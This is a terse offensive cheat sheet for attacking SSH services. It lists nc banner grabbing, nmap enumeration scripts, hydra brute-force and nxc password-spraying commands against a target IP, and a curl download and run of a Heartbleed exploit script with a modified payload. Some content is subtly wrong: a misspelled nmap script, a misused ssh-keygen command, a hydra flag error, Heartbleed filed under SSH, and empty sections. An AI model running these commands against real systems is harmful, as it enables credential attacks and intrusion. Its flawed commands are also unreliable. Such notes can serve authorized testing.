TCP: SSH - 22
Connection
ssh <Username>@<Target IP Address> [-p <Port>]
ssh -i <ID_RSA File Name> [-p <Port>] <Username>@<Target IP Address>
NOTE: Make sure id_rsa has permission of 400
chmod 400 <ID_RSA File Name>
Enumeration
Banner Grabbing
nc -vn <Target IP Address> 22
Grab Cert
ssh-keygen -t rsa <Target IP Address> [-p <Port>]
Vulnerability Scanning
ssh-audit -v <Target IP Address>
Nmap
Default Nmap script for SSH
nmap -sC -p <Port> <Target IP Address>
Retrieve version
nmap -sV -p <Port> <Target IP Address>
Retrieve support algorithms
nmap --script ss2-enum-algos -p <Port> <Target IP Address>
Retrieve weak keys
nmap --script ssh-hostkey --script-args ssh_hostkey=full -p <Port> <Target IP Address>
Check authentication method
nmap --script ssh-auth-methods --script-args="ssh.user=root" -p <Port> <Target IP Address>
Bruteforce
Normal Password Bruteforce
hydra -L <Username List> -P <Password List> -s <Port> ssh://<Target IP Address>
hydra -l <Username> -l <Password> -s <Port> ssh://<Target IP Address>
Passphrase Bruteforce
Password Spraying
nxc ssh <Target IP Address> -u <Username Lists> -p <Password Lists> --continue-on-success
nxc ssh <Target IP Address> -u <Username Lists> -H <Hash Lists> --continue-on-success
Exploit
Heartbleed.py
Github Repo: https://gist.github.com/eelsivart/10174134
curl -O https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
Modify the following part
def build_heartbeat(tls_ver):
heartbeat = [
0x18, # Content Type (Heartbeat)
0x03, tls_ver, # TLS version
0x00, 0x03, # Length
# Payload
0x01, # Type (Request)
0x40, 0x00 # Payload length
]
return heartbeat
python heartbleed.py <Target IP Address>
To include Hexdump
python heartbleed.py -x <Target IP Address>
For repeated run
python heartbleed.py -n <Count> <Target OP Address>
Fake user
Last updated